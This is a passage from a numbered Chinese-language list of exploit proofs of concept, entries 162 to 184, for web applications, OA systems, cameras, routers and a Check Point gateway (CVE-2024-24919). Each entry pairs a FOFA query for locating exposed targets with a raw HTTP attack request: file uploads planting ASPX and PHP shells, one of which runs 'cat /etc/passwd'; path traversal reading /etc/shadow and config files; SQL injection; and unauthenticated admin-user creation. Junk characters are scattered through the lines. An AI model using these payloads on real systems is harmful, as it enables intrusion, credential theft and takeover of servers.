http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
* X% E( M; }9 n4 y5 F) g) j; Y" V% rxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 V( B# i/ L6 g' A" S2 ]) ]
<soap:Body>, J3 j- e" w8 w# x) U+ n, F
<UploadResume xmlns="http://tempuri.org/">! k. b0 f; W' U2 z4 e
<ip>1</ip>1 _8 E/ k' g R5 m' V
<fileName>../../../../dizxdell.aspx</fileName>
; ?& _2 ?7 R2 {2 T% ?9 V<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>" j5 m3 D0 H* t6 m5 L! R
<tag>3</tag>
' i! z* Q2 k! \" {; L</UploadResume>/ b- d2 ]) U, B3 Z F/ ^
</soap:Body>2 @. x* p e U7 z J1 {6 b; u
</soap:Envelope>+ [' D& F( u6 |" C. k
4 x' s* ~' `; P5 ` R
0 @+ j3 P5 v p4 r& rhttp://x.x.x.x/dizxdell.aspx! @) H+ z. D( [: N# P
- ]4 L/ O$ g5 k+ q; X
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" C* A4 Y$ j' z0 L" _ H
FOFA: app="和丰山海-数字标牌"
3 s1 L- t4 w1 N$ E1 _2 _) t) yPOST /QH.aspx HTTP/1.14 [0 S5 i$ y9 j) t" g
Host: x.x.x.x
0 b4 h9 ?; E, A" d3 f! GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
D0 l( L" D+ e4 {' pConnection: close
9 {8 {. f4 N* X! i; T5 H6 D) yContent-Length: 583
2 v. V4 M2 P) G( i: {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
& C% M d9 d% I- b) s, ZAccept-Encoding: gzip
9 l }3 s) p! m7 Z+ n. B% u9 `2 D9 F f5 ^' b2 z
------WebKitFormBoundaryeegvclmyurlotuey$ K2 Q* y7 {' A, i0 B5 M% Y
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 l3 U' O* V5 P* t, w# H. w6 U$ S2 L
Content-Type: application/octet-stream/ u% {9 F, {; ^% [+ F5 N
4 T7 Y; \, n4 g" @
<% response.write("ujidwqfuuqjalgkvrpqy") %>
0 w. }# E1 \5 C* Q' n" [------WebKitFormBoundaryeegvclmyurlotuey
( @( Z R8 u0 X2 u9 i/ ^, N6 HContent-Disposition: form-data; name="action"
8 [* P" I3 E. d3 P4 K2 v m/ L; w, Z* J7 k
upload
3 i% l- Y/ L; ~( C* j& M* [------WebKitFormBoundaryeegvclmyurlotuey3 L# P" H% H7 t0 M( a$ F, s
Content-Disposition: form-data; name="responderId"
. \3 k" L: q0 b8 A! W- j
3 K P% L; ]7 r' p5 ?% S! wResourceNewResponder" ~0 u# |" R/ Q# n
------WebKitFormBoundaryeegvclmyurlotuey
9 v3 m% n8 s! ]# eContent-Disposition: form-data; name="remotePath"6 B# f4 p0 s) X# X
2 d8 J! a: V( \ x4 ?6 H" i- v$ X
/opt/resources
- e" m6 u! r! ]8 z0 ]! g& W; K------WebKitFormBoundaryeegvclmyurlotuey--3 L, r; @% A+ I( e
9 N+ d/ G% U7 s
3 ^9 c( Y. g7 w% E, a! p4 S: Ghttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
& Q \, ?6 s: _& q! j2 z' s( u1 v; b7 L; b2 y$ q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传9 R( y; W2 P% d3 T9 I
FOFA: icon_hash="-795291075"
5 H7 ^/ N; T& x- I) r0 e5 A9 }POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
. x: y" D4 Z; W4 ^ kHost: x.x.x.x
3 Y9 K! r N' K" h B0 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
5 o* r$ M1 K# oConnection: close
7 f" V$ H% O, v1 W2 cContent-Length: 293' s; i6 u, m( r A4 [& d5 u7 A
Accept: */*5 {$ ], h% `* }; _5 D9 t
Accept-Encoding: gzip, deflate
! I' d- k2 D) t% F- l6 |2 T2 FAccept-Language: zh-CN,zh;q=0.9
& M$ V$ F1 C- c; QContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod8 u! b3 a2 t( i- ]
' i( d* t4 @: S3 q/ {------iiqvnofupvhdyrcoqyuujyetjvqgocod
2 R) F# V* L- [$ R) VContent-Disposition: form-data; name="name"
$ y; t* J1 u: {) ~
4 ^- T1 j: P! f8 {( |1 ~8 V; R# C+ ~1.php
3 f' j" \1 \; P" d------iiqvnofupvhdyrcoqyuujyetjvqgocod
1 x( r" b' b9 D: p; C. QContent-Disposition: form-data; name="upfile"; filename="1.php"7 v& O O) C9 t. V; O
Content-Type: image/jpeg* a2 R9 a' S$ ?+ ~8 U
5 m* c) N! {; @: e
rvjhvbhwwuooyiioxega9 [( s5 }$ j+ k( U: f5 g; B
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
# n8 E& H$ z- j$ b" U9 g; D0 R- @. p
1 L% i0 p. A+ m" n7 Q E
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
$ w: C2 p. `! i" {9 b! BFOFA: title="智慧综合管理平台登入"
. h0 O/ n" b) b* `POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
/ `( R- v; Y H0 XHost: x.x.x.x- F3 Z5 P$ _! {$ u4 B+ P8 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.02 a/ b+ Z! e5 p" T: A+ r: o+ a$ n
Content-Length: 288/ \' v7 y' v; L' |
Accept: application/json, text/javascript, */*; q=0.01
' e9 d. O6 B# v1 ~8 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2," L% [) `' b" c
Connection: close* i3 a# T2 n9 b9 R# v' Z v
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl5 U: ~9 y# [0 P1 w7 A* K
X-Requested-With: XMLHttpRequest
- I3 x1 r: s1 {8 wAccept-Encoding: gzip
) z2 s8 n2 H( `! ^/ {4 G
8 F% |# }4 m( x------dqdaieopnozbkapjacdbdthlvtlyl
8 T' l1 J" B& W) w5 CContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ q! D" T. [2 W# O8 A2 H9 S
Content-Type: image/jpeg' l) b) K' Q$ z( g1 Q# o8 i# X
5 f8 q4 ^$ p. w" [: f; d<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>% x, R" r: ]1 S1 @( {0 o
------dqdaieopnozbkapjacdbdthlvtlyl--
* g$ s8 D# d/ K& Z* ^# ~) R" K# Z2 \# y" x% c
) g: p. g6 U& h* M+ W" K8 s5 O) t
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
8 o$ e" B5 A' H1 O" h* h* r2 r4 f0 J
# X' t( E2 N: I5 c' S) x6 L7 |& l165. OrangeHRM 3.3.3 SQL 注入. P5 Q- }8 I: B0 ?7 Y
CVE-2024-36428
: c4 q. R* p; p. t. M8 aFOFA: app="OrangeHRM-产品"
0 }; h8 B, u/ b& a3 m' P) HURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))7 Y' a" G1 i0 v! u$ p1 n) v
/ i+ O& C2 `( d- Y# `# m
2 y+ w0 [6 X$ T' ]# }/ Y166. 中成科信票务管理平台SeatMapHandler SQL注入! j, H$ H! ~0 b0 l6 W/ B$ I9 c3 x/ N
FOFA:body="技术支持:北京中成科信科技发展有限公司": w. X5 w$ l) R& Z; o( d
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.11 J# Y' I' U/ V" C% q8 o! {
Host:
1 [ w- s9 ~+ w; d' S, |# Z+ XPragma: no-cache
- m6 j; K& r5 F2 G; ?Cache-Control: no-cache/ L7 B5 J3 I3 D
Upgrade-Insecure-Requests: 1
2 ^, ]! c5 Z1 T$ P9 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
$ s% y# H: ~, b6 k7 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 G1 x' c' Z5 xAccept-Encoding: gzip, deflate
8 ?2 U9 p1 G# JAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
& R/ c" J e# X& PCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE. e* P6 P% ~( Y5 R- j
Connection: close
: A) d4 P% n# [: }3 u9 _8 pContent-Type: application/x-www-form-urlencoded# \, G! y0 z4 J1 Z. ^; e
Content-Length: 89- a6 y$ T0 e5 B
( F% v! `/ ^1 f& s+ F$ F9 PMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
. x4 X9 V8 h V8 A( v; }' R/ N+ D* U# ^( r2 F
8 x M# r) z# U9 ?
167. 精益价值管理系统 DownLoad.aspx任意文件读取
# }. N- g5 Q* g n) e JFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
7 P: A+ ?- d5 U6 {5 a: L. M; dGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- i0 H1 N$ w. K( c, K4 H
Host:
* [! ~' `/ S5 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( q" u+ E. @( O; m
Content-Type: application/x-www-form-urlencoded/ t% a: z2 H, v0 p, D& o
Accept-Encoding: gzip, deflate
/ P" W! [! @3 J* r7 j6 f7 Z( ]Accept: */*
8 m( V& `) {4 T) f$ nConnection: keep-alive" x% P% h# l X# b% G6 \
* ]6 d+ R, S4 o
& S( I8 z( U- o$ x
168. 宏景EHR OutputCode 任意文件读取
# }% R8 A* O: f& M+ qFOFA:app="HJSOFT-HCM"/ k+ Q. c9 w- G4 ~/ L/ j
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.14 o+ d, o8 _" M8 T4 O ^
Host: your-ip! B: ^( {# m% m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36' Q; F5 ~ g# [! g% h
Content-Type: application/x-www-form-urlencoded
- b( N% L* c6 p- t: A4 @0 oConnection: close
9 p y2 ?- @& H4 x+ O' d
3 ^& v2 ]3 I# n* l% `0 l8 V: b9 M+ T) o, Q9 k) T2 i- p
) s* j* v# ]$ U/ F7 ^" j& R
169. 宏景EHR downlawbase SQL注入
% u7 b3 m7 ~+ m. B! ~9 dFOFA:app="HJSOFT-HCM"
" a3 W. Z! q/ a$ |4 YGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1/ J1 r: U# c* O9 C8 V4 @1 s8 `
Host: your-ip/ Y, R7 w! J' w4 t! H; g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 C% _- n3 Q7 {5 k F7 r
Accept: */*
/ l! w! [4 }; G; s' C0 @' U+ j3 M' tAccept-Encoding: gzip, deflate
* S9 x5 [- v& l' `5 hConnection: close
; ]1 H% G; G3 q0 {: @+ W% _1 U7 t" v5 @$ @0 O$ v# z" S8 e
' v( S/ j# u0 Y5 V4 G0 z: x4 z
& ?* r9 W$ Y+ _
170. 宏景EHR DisplayExcelCustomReport 任意文件读取* `& U% ?8 M. c( X. W
FOFA:body="/general/sys/hjaxmanage.js"
- F& ^; [6 a: ^3 gPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
+ a: a4 s0 h' `0 [( e0 BHost: balalanengliang6 o0 B: w; @" j& q4 @0 i: ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" o) P# l8 {9 F" YContent-Type: application/x-www-form-urlencoded
9 P2 J2 F. G6 o% _& x# M, }& R
" b3 E7 h2 Z! ^! ^4 ]! {filename=../webapps/ROOT/WEB-INF/web.xml
! F4 K- Q: e5 C+ e9 E8 E# J- z0 _: ^' @: t+ e# C
+ [# y8 m- G. Z% E d Y( ?171. 通天星CMSV6车载定位监控平台 SQL注入1 T6 u" e1 A J6 o, A5 t
FOFA:body="/808gps/"; z8 ~/ h3 D" [. P9 r. R
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1) K$ m6 A5 u9 o6 \6 @& O/ o5 _
Host: your-ip
+ X1 ?/ p7 P) E7 W9 K2 C* TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0- C( \$ k, g" _, c8 d
Accept: */*
0 Z5 D6 X- B( m9 ]- y+ T FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 j# ~% z }* KAccept-Encoding: gzip, deflate
6 ^' m G# W* B& @" R& U' w7 lConnection: close9 F, ~9 L4 o7 E8 }7 v% w0 }2 c- Z
, A' r1 ?/ [& v+ n- j6 o# Z5 x5 S
/ y0 F, U j% G) @3 h' c/ R1 z5 B2 h. Z1 h& i" W
172. DT-高清车牌识别摄像机任意文件读取
2 w0 L( T# A: j7 NFOFA:app="DT-高清车牌识别摄像机") P; t. U& _: n. z# j8 _
GET /../../../../etc/passwd HTTP/1.1* y, l6 z5 k$ K5 {
Host: your-ip
* H6 A5 I4 f) |1 z- Y- w2 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. k& x- J4 H1 `! _) x9 h- JAccept-Encoding: gzip, deflate
- Q. y% q, D# j2 h3 |- yAccept: */*$ N1 i7 e, z: u& {6 k' W- g
Connection: keep-alive5 ?& z/ b7 T& ~! W* u
7 g, R9 S7 j! X0 _4 U x/ @* M2 n- G. Q/ k# M
0 X' u; ]$ P( K. C, W. Z1 S& d
173. Check Point 安全网关任意文件读取: |0 l2 c. v: l. {. N3 g$ M
CVE-2024-24919
( E9 i. ?& j9 O3 bFOFA:app="Check_Point-SSL-Network-Extender", A1 o7 {* U( E8 q9 }! E! I
POST /clients/MyCRL HTTP/1.1
# h9 T8 C: {! E2 E- Y+ P4 V# YHost: your-ip. k& W3 z5 n0 M% t/ o ?2 C
Content-Type: application/x-www-form-urlencoded
$ m0 {3 }3 }. E5 s5 F3 U6 P
3 h% {" V/ d* Q! P% WaCSHELL/../../../../../../../etc/shadow
2 C4 N' J4 v) s- s
0 y* E4 `6 Z0 m: j
, a2 z& D/ `3 P8 A3 g/ r+ s
( Y K7 Z+ z$ I5 S# |4 A174. 金和OA C6 FileDownLoad.aspx 任意文件读取& x2 h# Q/ j7 F5 g
FOFA:app="金和网络-金和OA": E9 d% T: l% P! D/ Y- {0 m- g
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1, |% Q8 M. C+ z+ B
Host: your-ip
$ C# y2 h6 U* {- k) @0 {/ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" \0 Q- N$ q; c3 I1 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 c5 @- l- y8 A% ~
Accept-Encoding: gzip, deflate, br* F* f' N# y2 T6 J8 q! G
Accept-Language: zh-CN,zh;q=0.9: r- q# g# y# f8 n+ _ i2 j
Connection: close- B- v* ?9 H9 n1 u& P* b2 j
2 {9 g+ G6 Y1 C" o2 B, ^
: K" @/ t7 s2 n9 R5 \* E
1 _" Z5 B9 u' `6 d0 s1 z
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& W5 z2 e+ y6 y1 L" E2 T0 t
FOFA:app="金和网络-金和OA"! \9 e9 }' C& C0 B% q5 }
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1# D) S1 t5 L. d8 A% @
Host:. Y5 r( [; y& A6 O f
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 d. j( Y- g* M' r: FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, \* y1 B# N5 n; VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 ^% j+ i! k7 I: u* |4 ^( G
Accept-Encoding: gzip, deflate* t" o* }' V6 Z% a! h6 O6 Y8 [0 @
Connection: close: n: Y! e/ e: u$ e
Upgrade-Insecure-Requests: 1
+ U+ l2 A; K/ {' S4 i# ^ q# Z( {+ _/ S' R" z4 |
; \+ y* D( d* h k$ `8 A
176. 电信网关配置管理系统 rewrite.php 文件上传5 a' E4 c* @! m* H
FOFA:body="img/login_bg3.png" && body="系统登录"
2 V: R* a8 N7 Q0 ^5 UPOST /manager/teletext/material/rewrite.php HTTP/1.10 H* E5 v( H+ Q6 D8 Y3 T
Host: your-ip* O1 m! {) P& w7 F/ ?9 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 x9 [: F) L- Q" i3 F# d+ hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
8 L. F) i* N& Z% [" D+ G+ BConnection: close
: y0 l. z: A$ Q x, j# H5 o' {! Z( B* \: n' U9 M
------WebKitFormBoundaryOKldnDPT
* F0 Q2 Y; V! }2 ~* @5 AContent-Disposition: form-data; name="tmp_name"; filename="test.php"/ V Q/ n& U5 P/ A/ {
Content-Type: image/png& o; F. f4 `3 x; ]4 @! R( Q/ h3 t
5 Z8 g5 ]" Z; I5 y0 L6 {9 V
<?php system("cat /etc/passwd");unlink(__FILE__);?>* o. L& x& P0 x' a5 ^ l1 ?
------WebKitFormBoundaryOKldnDPT
4 `: J5 u4 A, RContent-Disposition: form-data; name="uploadtime"
- r) Y2 ^6 @% [7 a& n2 i) Q
9 x/ X3 d" a- c. w# f
- N# _% v0 V8 y* U------WebKitFormBoundaryOKldnDPT--, `7 L* K* z z6 m8 P
- a' O) S9 Z* G/ z3 m5 }
) p' | @( r ]2 y! y
6 f0 G% ?" d) k& Y; a1 o6 u
177. H3C路由器敏感信息泄露' D/ C3 u: K1 B6 K) a" A
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg" i( Y$ p [) n
/userLogin.asp/../actionpolicy_status/../M60.cfg
2 a; y% u' O: l4 R$ O/userLogin.asp/../actionpolicy_status/../GR8300.cfg- M. _, c8 e' P5 ?% a3 i4 j7 n3 a* r
/userLogin.asp/../actionpolicy_status/../GR5200.cfg2 F7 Z5 S+ E4 E( \' Y0 C
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
, r, V w. E; L9 C/userLogin.asp/../actionpolicy_status/../GR2200.cfg
6 H" R- c& a' m1 m/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg1 o# Q* [) |8 l- S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ p# O, [2 p$ ~; n* Y' P4 G
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg" ?& m0 c# o; ` f6 z/ u7 P. ^1 c; ?
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
+ F( ~0 l: h" K6 Y, G/userLogin.asp/../actionpolicy_status/../ER5200.cfg) t, v' Q L; @5 E
/userLogin.asp/../actionpolicy_status/../ER5100.cfg i8 ]* {3 s; x
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg8 m' j. ~1 `0 x& ~& g
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
w$ `5 _) y, f3 q+ j+ i- s/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg2 A' {8 s7 A' o8 q) G* O
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
# S6 p" C) B; E. E, l/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 N) K. I& G) H2 I( w; z$ F/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
g _$ S; E9 r7 X" J; ~/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg7 i* t7 G# u" _& \3 [. k k
/userLogin.asp/../actionpolicy_status/../ER3100.cfg7 T$ o% @4 L$ V+ }& b% o0 `
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
( t8 t" v# A. P6 _7 K* `+ v' M9 M# S z7 x4 O! o5 M& ?# _/ n0 h
; U0 \0 d7 D) S, k178. H3C校园网自助服务系统-flexfileupload-任意文件上传
/ q0 ^9 l# O! _9 r" d7 r& q1 a3 YFOFA:header="/selfservice"
4 N. z5 u3 _. e* q5 D& EPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
+ Z, u9 ^2 Y/ G& h) C" Y+ hHost:3 u" t% y! @) ~1 ]6 p @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% l- p d4 o8 K" I0 C" dContent-Length: 2526 p8 }& }9 u' w9 B
Accept-Encoding: gzip, deflate
6 Q$ \+ Q' [" ?) V5 xConnection: close
7 B; m* n( n; V8 s; N" b3 zContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
# d# B; |+ N& ?9 g6 u1 ^-----------------aqutkea7vvanpqy3rh2l
z6 E& e& G" q, r0 p# Q4 w$ @" Q' OContent-Disposition: form-data; name="12234.txt"; filename="12234"+ L5 {7 c/ w+ H S- \9 R: e
Content-Type: application/octet-stream
# l0 R: F( e% L7 c0 Y+ wContent-Length: 255- U; e$ ]% e& r& H6 H1 E
# W1 f" h4 f4 \% v12234
. e t, g/ M8 p: ?3 F. z-----------------aqutkea7vvanpqy3rh2l--8 ` E' [) C5 i
/ U( u; w1 c) q* Z
! ]% B" X. ~0 s! Q; ^. ]7 XGET /imc/primepush/%2e%2e/flex/12234.txt
0 f: x# A1 j" e! _& u- J% I& f- G! s+ s. E G
' N# }5 d$ E5 q( ^9 C0 B179. 建文工程管理系统存在任意文件读取
2 s. S q$ X* I; r( q6 KPOST /Common/DownLoad2.aspx HTTP/1.1
! H. @. l& S( y, F8 u, M9 E: v8 GHost: {{Hostname}}; k: i& D( V' n" @% t s- X c
Content-Type: application/x-www-form-urlencoded
# V Q) L" U1 e' y4 \6 x# ]User-Agent: Mozilla/5.0( z4 Q: B3 e- j1 \# Z. U# ~
% `! d0 F+ u6 ^1 @% l4 D3 c
path=../log4net.config&Name=
6 T" Q0 m& `, o1 w J2 n6 [- a( T$ z1 t J
% {: Z. a" h$ H* x/ H" t1 e$ `180. 帮管客 CRM jiliyu SQL注入
. k, X, C8 P% ^. t8 ZFOFA:app="帮管客-CRM") T1 {$ v7 v! M; b" d z. c
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.16 w$ d* ~% ?9 O2 J4 e( h) s
Host: your-ip
0 O, Z/ Z, S, s0 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ u% {: }0 ]- ^8 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% i' r5 R& v5 E+ m- X
Accept-Encoding: gzip, deflate+ {4 q: B% z% c" P; ` X' o6 b/ P# P
Accept-Language: zh-CN,zh;q=0.9
& d: D4 }$ W4 |- m; D# j6 @% W! MConnection: close
& j0 E* S# y' v8 m7 _. S' R5 T" }: L0 s" Y5 _ @
2 T2 g/ r3 S# b0 L$ t2 S9 c181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
w* u: ]' H) H1 A1 {8 B# ~, D$ o7 JFOFA:"PDCA/js/_publicCom.js"5 J% m4 x( y: Z% O- ]4 Y
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.15 i5 ]4 i4 m" n$ t6 l$ R% p4 s
Host: your-ip1 s3 G3 R( d" g+ e+ F$ Y0 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' Z: ^* H$ Z. L& ^' u5 J1 P5 _. wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, |4 E- ~, d; a0 w* R4 dAccept-Encoding: gzip, deflate, br
" c, P8 R# R! O0 x7 GAccept-Language: zh-CN,zh;q=0.9
6 v @) q/ }9 M- `Connection: close
' F7 D) \* D; S! b8 X, z4 hContent-Type: application/x-www-form-urlencoded
+ ]( u& _6 }' [3 E3 G7 K) V* s; h# {4 n8 C8 K
+ A- c; D% A0 ~9 D% w8 g6 c& S, ]0 raction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
4 ^3 E V3 P: U" `( T1 X) ~& J. F- I
$ A% h& Z+ c/ A5 f( T7 E1 e( G
5 ]2 o% A/ W& u8 b' h* d: X182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" _5 A4 h$ E. a5 f8 j G
FOFA:"PDCA/js/_publicCom.js"! B; T2 {" L- V/ r! T9 L
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
) e6 h4 l1 \! B3 \Host: your-ip
( |7 N: \( r8 {- f' yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' l8 R7 q' h q3 h) y0 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 K% j: u( q3 v. |) m2 `+ F* O$ R
Accept-Encoding: gzip, deflate, br% U9 u" F) d$ n6 H' n
Accept-Language: zh-CN,zh;q=0.91 ~! ?/ P/ H$ Q, V* c
Connection: close+ O, M k) j: [0 R
Content-Type: application/x-www-form-urlencoded/ X, ?- m, M# X, t
9 x. `9 n4 e1 S. Z& K" ]
' x; n3 u$ F; L( ?$ {4 m6 rusername=test1234&pwd=test1234&savedays=1
# y# X; J) _, h( _9 B
; x; }! r' }* A3 E2 d- d
- b0 F) a2 z+ H183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入& p% u z0 g' J/ y3 p" m- w
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"' G. o9 R0 m! ^0 W
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1. g+ h5 f o$ U' o' f, j
Host: your-ip
- l6 \& D3 p' O O* ^( K6 ]User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# k4 J3 t0 {+ E( v
Accept-Charset: utf-83 B, b" T5 t0 h8 |4 u/ u: P1 ~8 T7 P
Accept-Encoding: gzip, deflate
, d3 v; h6 g; q8 bConnection: close& y$ [8 z: H9 ^
" w& r0 @+ z; l) N4 E$ h5 W0 t7 h. ~/ O) q0 u
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% C/ B3 Z% d: U6 _$ T& K
FOFA:server="SunFull-Webs"9 G7 K, M9 }6 y* b7 Z; d: y
POST /soap/AddUser HTTP/1.16 N* ]1 c0 }+ ^- _% g! V( [7 C
Host: your-ip
& G" S" ^" W, T7 ?Accept-Encoding: gzip, deflate
. b0 q' M* k- I2 b0 [: L8 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0: r$ b8 W6 A) w
Accept: application/xml, text/xml, */*; q=0.01
2 e- a3 w- l4 e8 ^, aContent-Type: text/xml; charset=utf-8
, G. Q; D E# t3 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- _1 ]7 z) N9 N; c! C2 ~2 CX-Requested-With: XMLHttpRequest
4 \$ z2 G. P- O" b# D4 v7 C
